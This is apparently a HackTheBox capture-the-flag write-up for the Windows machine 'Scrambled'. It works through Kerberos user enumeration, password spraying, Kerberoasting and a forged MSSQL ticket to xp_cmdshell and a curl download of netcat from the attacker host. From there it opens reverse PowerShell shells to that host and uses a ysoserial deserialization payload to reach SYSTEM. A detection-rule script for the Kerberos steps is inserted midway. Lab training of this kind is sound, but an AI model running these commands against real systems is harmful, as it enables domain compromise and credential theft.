Scrambled is one of the machines currently available on the HackTheBox hacking platform, rated Medium difficulty.
In this case it is a machine based on the Windows operating system.
Port scan
As usual, we add the IP of the Scrambled machine, 10.10.11.168, to /etc/hosts as scrambled.htb and start with an nmap port scan.
```
# Nmap 7.92 scan initiated Fri Aug  5 12:53:46 2022 as: nmap -sV -sC -oA enumeration/nmap1 10.10.11.168
Nmap scan report for 10.10.11.168
Host is up (0.043s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-05 12:53:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-05T12:53:39
|_Not valid after:  2052-08-05T12:53:39
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info:
|   10.10.11.168:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-08-05T12:54:41
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug  5 12:55:18 2022 -- 1 IP address (1 host up) scanned in 92.79 seconds
```
We see several possibilities in this first scan, so we will enumerate every option.
Enumeration
We start by reviewing the web portal on port 80; opening it in the browser, we see the following web page.
Browsing through it, we find a page stating that NTLM authentication has been disabled because of a security breach.
Continuing through the portal, we find a page with information about an executable that debugs a service over port 4411.
We test a connection to that port and get access.
```
$ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
```
Another important finding on the password-reset page is that the reset service is down, so users have to contact IT to have it restored, using the username as the password; this hints at the type of attack to run against Kerberos.
Kerberos enumeration
Having reviewed the web portal, we use kerbrute to enumerate Kerberos users with the following wordlist.
```
$ kerbrute userenum -d scrm.local --dc dc1.scrm.local /data/tools/kerberos_enum_userlists/A-ZSurnames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop

2022/08/05 13:05:28 >  Using KDC(s):
2022/08/05 13:05:28 >  	dc1.scrm.local:88

2022/08/05 13:05:28 >  [+] VALID USERNAME:	 ASMITH@scrm.local
2022/08/05 13:05:49 >  [+] VALID USERNAME:	 JHALL@scrm.local
2022/08/05 13:05:51 >  [+] VALID USERNAME:	 KSIMPSON@scrm.local
2022/08/05 13:05:52 >  [+] VALID USERNAME:	 KHICKS@scrm.local
2022/08/05 13:06:09 >  [+] VALID USERNAME:	 SJENKINS@scrm.local
2022/08/05 13:06:29 >  Done! Tested 13000 usernames (5 valid) in 60.700 seconds
```
We have discovered 5 valid users; now we try to obtain their passwords, using each username as its own password, as we saw on the portal.
```
$ for i in $(cat files/users.txt);do kerbrute bruteuser -d scrm.local --dc dc1.scrm.local files/passwords.txt $i;done

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop

2022/08/05 13:10:59 >  Using KDC(s):
2022/08/05 13:10:59 >  	dc1.scrm.local:88

2022/08/05 13:10:59 >  Done! Tested 5 logins (0 successes) in 0.327 seconds

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop

2022/08/05 13:10:59 >  Using KDC(s):
2022/08/05 13:10:59 >  	dc1.scrm.local:88

2022/08/05 13:11:00 >  Done! Tested 5 logins (0 successes) in 0.115 seconds

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop

2022/08/05 13:11:00 >  Using KDC(s):
2022/08/05 13:11:00 >  	dc1.scrm.local:88

2022/08/05 13:11:00 >  [+] VALID LOGIN:	 KSIMPSON@scrm.local:ksimpson
2022/08/05 13:11:00 >  Done! Tested 5 logins (1 successes) in 0.236 seconds

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop

2022/08/05 13:11:00 >  Using KDC(s):
2022/08/05 13:11:00 >  	dc1.scrm.local:88

2022/08/05 13:11:00 >  Done! Tested 5 logins (0 successes) in 0.328 seconds

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop

2022/08/05 13:11:00 >  Using KDC(s):
2022/08/05 13:11:00 >  	dc1.scrm.local:88

2022/08/05 13:11:00 >  Done! Tested 5 logins (0 successes) in 0.291 seconds
```
And we get a valid login
```
KSIMPSON@scrm.local:ksimpson
```
Obtaining the sqlsvc user's credentials
We now have a user, so we request their Kerberos TGT to continue; for that we use impacket's getTGT tool.
```
$ impacket-getTGT scrm.local/ksimpson:ksimpson
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Saving ticket in ksimpson.ccache
```
We export the variable pointing at the generated ccache file
```
$ export KRB5CCNAME=ksimpson.ccache
```
And now we proceed to enumerate other services.
We connect with impacket's smbclient tool and discover a very interesting PDF file.
```
$ impacket-smbclient -k scrm.local/ksimpson@dc1.scrm.local -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands
# use public
# ls
drw-rw-rw-          0  Thu Nov  4 22:23:19 2021 .
drw-rw-rw-          0  Thu Nov  4 22:23:19 2021 ..
-rw-rw-rw-     630106  Fri Nov  5 17:45:07 2021 Network Security Changes.pdf
# get Network Security Changes.pdf
```
That file tells us the access vector of the breach was a database user, so that account may well hold significant privileges.
We enumerate accounts with SPNs using GetUserSPNs.
```
$ impacket-GetUserSPNs -dc-ip dc1.scrm.local -no-pass scrm.local/ksimpson:ksimpson -k -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 16:32:02.351452  2022-08-05 12:53:37.787451
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 16:32:02.351452  2022-08-05 12:53:37.787451

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$d48a0ffd03dd3672b496efea3a256499$ecfa8d13dca82bdb50adcb1f74ce242082fa512f55adb3e308192ed3a9ef0f5cd89c8c7d36d5a39c0d420cdba744cfbd322ea44af33e6fe80891a23bca8ebfb319589c9620c0a35e38158c2ac1108a05d78f50aa8fc69ae806fddc693ec8c718b9eb18a8403ada1858dbd314c1795d101cec308ef31413499bf681fc32e6de18e2f321cf32f29fc2f47af87ae86dfd7c31abb0385c57bde4895f48da6da50ad3b9544b9a4e1e2a5dd099946762ece9df3065831424e484e140cf4c985382887400361839098270780a2216d7afb26e287f66b2d961e6d2c9502ab4f6d75e34027520d8dda308eaea0be2bc130f5c5150acf0a696efdc17753e514d1f32dcc095f611365333cbbd16a642a2b4f7e6fee41d539d43218308f224908cc66d6a978142c47dd2b92f5015a9fd142e3186fc0d827c0897b53a342a6dcf73e4d40a32a64d576736f4bc28901ff411b5621b9aa46905602d0b290b7b3ac86cedcde9375780ee326c691684c7a9ea52e1d588efb4dcb7341293ca2274a2cd7f4a21a7c61c792531df79ae9537390da6948b4899b2f679e175b8ceddbd08090a667db006868d1018b08c58c68145c7f8d5de20eaeeb00db342e99cb139f8f893eb78aabb2917ce5890b28760ef460855a91954a4cdc5e26a49c7a917144f653d8739be5a7bc43e6a755f1f39484ec00df571ffd3247d370c784012fc4851818f9b314f03a24ae2bf2e1f40d94fadaf2e3de728b366fc440e8d6324158734d46644b438f963885b1cd690ce6108b3483e23498342666181a110241f3e82466c7b75f37603bc91802c762ea50188f22c1258f6e70cb876967d2a5f9c087c1ed6a8ae0f062662c6ce44e7e013506e1ddf052aff67261173196bec5fc27d48b6d4bc22463fbbab9cebb42523d2d4b27ed70536715e1957fbd80a0d7d761acf57c5ccd8c47ea27e6c108f0c211905504ce8be2c0cc5462d8cd36680d05ad865f37bdbdbbe40aee5db465c8a51e3c9784b0293de03a246fbce1c94fa2be75e0411b2e9f5cb9122da696689e5ee73bcac181d1a607afe14693f831bfc08b1a1ead5a76f44920b4f1099738226c4e0cbdb3a76ce10ce3ef89639641f0c2664f66bde57d7d270e4f5593fe079707336d77c6a8a442f39ea641f750bb16abfe37269da880c84763b2eac4c5c5538b366a0275027cb45c2f0eed09da219de4ff48de4748a9056f646a5b0fd7618cb2f06d7f41a9573ca933d6b4d90bb809ebf537a569cf810aa453daa91b9fc9f76b760df96ab4ea97d389134ee17cf973d7b94404ce2f8b33ea7c6bdbfa81f2cff49613a877138b1d2f7798efcd10ac58a2985e5cea43ef884eca54c2c24fffc9d03ebc0c51062c4efef81ef3d2e44034741a9f35370e9b826dbbd6f173c9dc43057965c53f6575b48a5e0962308d05ab612aa52e947b83c
```
And we have the sqlsvc user's hash, so we use john to recover the plaintext password
```
$ john -w=/usr/share/wordlists/rockyou.txt keys/sqlsvc.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60        (?)
1g 0:00:00:13 DONE (2022-08-05 14:04) 0.07163g/s 768586p/s 768586c/s 768586C/s Peguero..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
And we have a username and password
```
sqlsvc:Pegasus60
```
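Both Kerberos steps above, the AS-REQ username enumeration and the RC4 service-ticket request that produced the sqlsvc hash, leave traces on the domain controller. The following Python is an added example, not code from the writeup: it runs the corresponding detection rules over constructed Security events 4768 and 4769, with field names reduced to what the rules need and thresholds chosen as illustrative assumptions.

```python
"""Detection rules for the Kerberos techniques above, run over constructed
Windows Security events (4768 = AS-REQ / TGT request, 4769 = TGS-REQ).
Added example, not code from the writeup; the event dicts keep only the
fields the rules need (status = Kerberos result code, enc_type = ticket
encryption type, service = account owning the requested SPN)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs from the machine).
EVENTS = (
    # kerbrute userenum: one AS-REQ per wordlist entry; unknown names fail
    # with 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), all from one source in seconds
    [{"id": 4768, "time": f"2022-08-05T13:05:{i:02d}", "ip": "10.10.14.4",
      "user": f"NOSUCHUSER{i:03d}", "status": "0x6"} for i in range(25)]
    # kerbrute bruteuser: wrong guesses for real users fail with 0x18
    # (KDC_ERR_PREAUTH_FAILED); several accounts from one source = spray
    + [{"id": 4768, "time": "2022-08-05T13:11:00", "ip": "10.10.14.4",
        "user": u, "status": "0x18"} for u in ("ASMITH", "JHALL", "KHICKS", "SJENKINS")]
    + [
        # the guess that worked, then the RC4 (0x17) service ticket for the
        # sqlsvc SPN that the writeup cracks offline
        {"id": 4768, "time": "2022-08-05T13:11:00", "ip": "10.10.14.4",
         "user": "KSIMPSON", "status": "0x0"},
        {"id": 4769, "time": "2022-08-05T13:40:10", "ip": "10.10.14.4",
         "user": "ksimpson", "service": "sqlsvc", "enc_type": "0x17"},
        # benign noise: an AES ticket for a machine account, one mistyped password
        {"id": 4769, "time": "2022-08-05T13:41:00", "ip": "10.10.11.50",
         "user": "jhall", "service": "DC1$", "enc_type": "0x12"},
        {"id": 4768, "time": "2022-08-05T13:42:00", "ip": "10.10.11.50",
         "user": "JHALL", "status": "0x18"},
    ]
)


def _burst(events, window):
    """Per source IP, the most distinct account names seen inside any `window`."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"].upper()))
    best = {}
    for ip, items in by_ip.items():
        items.sort()
        start, peak = 0, 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            peak = max(peak, len({u for _, u in items[start:end + 1]}))
        best[ip] = peak
    return best


def detect(events, window=timedelta(seconds=60), enum_min=20, spray_min=3):
    """Return (rule, source_ip, detail) tuples; thresholds are illustrative."""
    findings = []
    unknown = [e for e in events if e["id"] == 4768 and e["status"] == "0x6"]
    for ip, n in _burst(unknown, window).items():
        if n >= enum_min:
            findings.append(("kerberos_user_enumeration", ip, n))
    bad_pw = [e for e in events if e["id"] == 4768 and e["status"] == "0x18"]
    for ip, n in _burst(bad_pw, window).items():
        if n >= spray_min:
            findings.append(("kerberos_password_spray", ip, n))
    for e in events:
        # RC4 tickets for user-owned SPNs (not machine accounts, not krbtgt)
        # are crackable offline, which is exactly what the writeup does
        svc = e.get("service", "")
        if (e["id"] == 4769 and e.get("enc_type") == "0x17"
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            findings.append(("kerberoast_rc4_tgs", e["ip"], f"{e['user']}->{svc}"))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(*finding)
```

The forged MSSQL ticket used later in the writeup never touches the KDC, so no 4769 is produced for it; that step is caught on the SQL host itself (logon events for an account that never requested a ticket) or prevented by rotating the sqlsvc password and moving it to a gMSA, not by these rules.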
Accessing MSSQL
The next step is to access the MSSQL service on the machine as the sqlsvc user, and for that we first need two things
- The domain SID
- The user's password converted to its NTLM (NT) hash
We get the SID first with the secretsdump tool: the dump itself fails, but its debug output shows the domain SID in the DRSCrackNames call.
```
$ impacket-secretsdump -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: /tmp/ksimpson.ccache
[+] SPN CIFS/DC1.SCRM.LOCAL@SCRM.LOCAL not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/SCRM.LOCAL@SCRM.LOCAL
[+] Using TGT from cache
[+] Trying to connect to KDC at SCRM.LOCAL
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_WeeXgKTF
[+] Trying to connect to KDC at SCRM.LOCAL
[+] Calling DRSCrackNames for S-1-5-21-2743207045-1827831105-2542523200-500
[+] Calling DRSGetNCChanges for {edaf791f-e75b-4711-8232-3cd66840032a}
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/secretsdump.py", line 230, in dump
    self.__NTDSHashes.dump()
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 2612, in dump
    userRecord = self.__remoteOps.DRSGetNCChanges(
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 580, in DRSGetNCChanges
    return self.__drsr.request(request)
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 880, in request
    raise exception
impacket.dcerpc.v5.drsuapi.DCERPCSessionError: DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
```
And we convert the password to NTLM with codebeautify's online tool.
Now that we have the required data, we forge a ticket for the MSSQL service as the Administrator user.
```
$ impacket-ticketer -domain scrm.local -spn MSSQLSVC/dc1.scrm.local -user-id 500 Administrator -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
```
We export the ccache file
```
$ export KRB5CCNAME=Administrator.ccache
```
And we connect to the database using that ticket.
```
$ impacket-mssqlclient dc1.scrm.local -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server   (150 7208)
[!] Press help for extra shell commands
SQL>
```
Exploiting MSSQL
Now that we are inside MSSQL, we enumerate the existing databases.
```
SQL> SELECT name FROM master.dbo.sysdatabases
name
----------
master
tempdb
model
msdb
ScrambleHR
```
We list the tables of the ScrambleHR database.
```
SQL> use ScrambleHR
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
[*] INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL> SELECT * FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE
-------------   ------------   ----------   -------------
ScrambleHR      dbo            Employees    b'BASE TABLE'
ScrambleHR      dbo            UserImport   b'BASE TABLE'
ScrambleHR      dbo            Timesheets   b'BASE TABLE'
SQL>
```
And we dump the contents of the UserImport table.
```
SQL> SELECT * FROM UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups
--------   -----------------   ----------   ---------------   -------------
MiscSvc    ScrambledEggs9900   scrm.local                90               0
SQL>
```
In it we find the credentials of the MiscSvc user
```
MiscSvc:ScrambledEggs9900
```
Given what the PDF said, we use xp_cmdshell to try to execute commands on the machine.
```
SQL> enable_xp_cmdshell
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
scrm\sqlsvc
NULL
SQL>
```
So we download netcat to obtain a proper shell.
```
SQL> xp_cmdshell curl http://10.10.14.4:8000/nc64.exe -o C:\Temp\nc64.exe
output
--------------------------------------------------------------------------------
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 45272  100 45272    0     0   239k      0 --:--:-- --:--:-- --:--:--  238k
NULL
SQL> xp_cmdshell dir C:\Temp\
output
--------------------------------------------------------------------------------
 Volume in drive C has no label.
 Volume Serial Number is 5805-B4B6
NULL
 Directory of C:\Temp
NULL
05/08/2022  15:20    <DIR>          .
05/08/2022  15:20    <DIR>          ..
05/08/2022  15:21            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)  15,997,759,488 bytes free
NULL
SQL> xp_cmdshell C:\Temp\nc64.exe -e powershell 10.10.14.4 4444
```
And we get a connection on our listener.
```
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from scrambled.htb [10.10.11.168] 64803
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
scrm\sqlsvc
```
Escalating to the MiscSvc user
We use the credentials found earlier to escalate to the MiscSvc user: first we build the credential object, then we use it to run commands as that user.
```
PS C:\users> $password = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$password = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
PS C:\users> $credentials = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $password)
$credentials = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $password)
PS C:\users> Invoke-Command -Computer dc1 -Credential $credentials -Command { whoami }
Invoke-Command -Computer dc1 -Credential $credentials -Command { whoami }
scrm\miscsvc
```
So we use netcat again to get another reverse shell.
```
PS C:\users> Invoke-Command -Computer dc1 -Credential $credentials -Command {c:\temp\nc64.exe -e powershell 10.10.14.4 4445}
Invoke-Command -Computer dc1 -Credential $credentials -Command {c:\temp\nc64.exe -e powershell 10.10.14.4 4445}
```
And we are in as the miscsvc user.
```
$ nc -lvp 4445
listening on [any] 4445 ...
connect to [10.10.14.4] from scrambled.htb [10.10.11.168] 64828
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\miscsvc\Documents> whoami
whoami
scrm\miscsvc
```
Obtaining the user flag
Once in as that user, we go to their desktop to read the first flag.
```
PS C:\Users\miscsvc\Documents> cd ..\desktop
cd ..\desktop
PS C:\Users\miscsvc\desktop> dir
dir


    Directory: C:\Users\miscsvc\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       05/08/2022     13:52             34 user.txt


PS C:\Users\miscsvc\desktop> type user.txt
type user.txt
1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0
PS C:\Users\miscsvc\desktop>
```
Privilege escalation
Next we look for the application mentioned on the web page and find an .exe and a .dll.
```
PS C:\shares\it\apps\Sales Order Client> dir
dir


    Directory: C:\shares\it\apps\Sales Order Client


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       05/11/2021     20:52          86528 ScrambleClient.exe
-a----       05/11/2021     20:52          19456 ScrambleLib.dll
```
To download them we have two options: copy them to the Public folder at C:\Shares\Public and fetch them over SMB as we did with the PDF, or use the powercat tool.
In our case we use the tool as follows.
```
PS C:\shares\it\apps\Sales Order Client> powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleClient.exe"
powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleClient.exe"
PS C:\shares\it\apps\Sales Order Client> powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleLib.dll"
powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleLib.dll"
```
We analyse the files with dnSpy and find a deserialization vulnerability in the UploadOrder function.
So we generate our payload, using the ysoserial tool for that.
```
.\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\Temp\nc64.exe -e powershell 10.10.14.4 4447"
```
And we send our payload through port 4411, which we saw at the start.
```
$ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;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
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.
```
And on our listener we get access as SYSTEM.
```
$ nc -lvp 4447
listening on [any] 4447 ...
connect to [10.10.14.4] from scrambled.htb [10.10.11.168] 49882
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
```
Obtaining the root flag
The last step is to read the flag on the Administrator user's desktop.
```
PS C:\Windows\system32> type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxd
PS C:\Windows\system32>
```
And we have our root flag, completing the machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link.